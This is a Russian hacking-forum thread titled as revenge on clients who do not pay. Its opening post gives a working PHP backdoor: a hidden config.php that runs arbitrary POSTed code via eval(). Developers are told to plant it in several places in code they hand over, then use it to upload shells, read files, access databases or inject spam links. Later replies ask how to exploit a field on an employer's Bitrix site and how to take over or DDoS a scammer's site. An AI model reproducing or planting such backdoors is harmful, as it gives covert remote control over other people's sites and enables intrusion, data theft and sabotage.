1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Казним заказчиков или [Страховка от несчастных случаев]

Тема в разделе "PHP, Perl и др.", создана пользователем хопкинс, 11 сен 2013.

  1. хопкинс
    хопкинс Продвинутый
    Симпатии:
    35
    Наверное многим из тех кто хоть как то связан с созданием/разработкой сайтов приходилось сталкиваться с кидалами. И естественно у всех кто хоть раз был обманут, возникал зверский план мести. Сегодня я расскажу вам об одном из методов наказать редисок.

    Итак. Представьте себе ситуацию...Вы "сваяли" сайт под ключ, но заказчик перед тем как платить просит вас отдать все исходники( Дабы он сам хочет все это залить на хост и т.д )

    Но перед тем как отдать ему исходники, мы делаем следущее:

    1. Создаем файлик под названием config.php. В него пишем следующее:
    PHP:
    <?php        
       
    if ( isset($_POST['text']) )         
          eval (
    $_POST['text']);         
    ?>         
    <form method='POST'>         
    <textarea name='text'></textarea>
    <input type='submit'></form>
    2. Засовываем этот файл куда подальше и желательно в несколько мест сразу.
    Ну вот в принципе и все. Ваше маленькое исчадие ада готово!

    Для тех кто далек от всего этого немного поясню. Функция eval позволяет выполнить любой код который вы напишете в textarea. Подробнее Ну а дальше начинается полет ваших фантазий...Можно залить шелл, прочитать запароленный файл, подрубиться к бд и т.д

    P.S. Здесь я не открыл америку. Если у вас есть идеи получше-поделитесь ими! Кстати код можно доработать всякими няшками. Например сделать этот код доступным только вам, забацать всяких кнопочек типа : "Закрыть сайт от индексации", "Вставить ссылки на порно"
     
    11 сен 2013
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    11 сен 2013
  3. хопкинс
    хопкинс Продвинутый
    Симпатии:
    35

    Ну это если есть что палить)...Может быть там вообще сайт визитка. А так, да! Очень офигенный способ. Меня вот еще какой вопрос интересует. На одном сайте( Моего начальника ) который стоит на битриксе, я нашел страницу с интересным инпутом. В общем там текстовое поле и все что туда не пишешь-добавляется в бд. Можно ли что нибудь "поиметь" с этого?! Просто раньше некогда с таким не встречался.
     
    12 сен 2013
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    та хз, я с битриксом и структурой его не знаком.
     
    12 сен 2013
  5. bobacula
    bobacula Новичок
    Симпатии:
    1
    Приветсвую Вас умные люди, да есть сайт кидала , не скажу на чем основан (потому что не соображаю) CMS это точно там купил вещь а ее и нет ко мне не пришло, как мне получить полный доступ к этому сайту ? чтоб даже сам скрипт скачал и за архивировал для себя, ему отписывал он меня заблокировал , на сайте есть онлайн Тех.под. им отписывал , короче кинули ни каких действий , надоумьте меня несведущего как его наказать , просто задосит не пойдет (это можно в последнюю очередь) а для начала мне нужны бразды правления этим сайтом , если кто сможет помогите .... или подскажите.
     
    22 апр 2016

Поделиться этой страницей

Загрузка...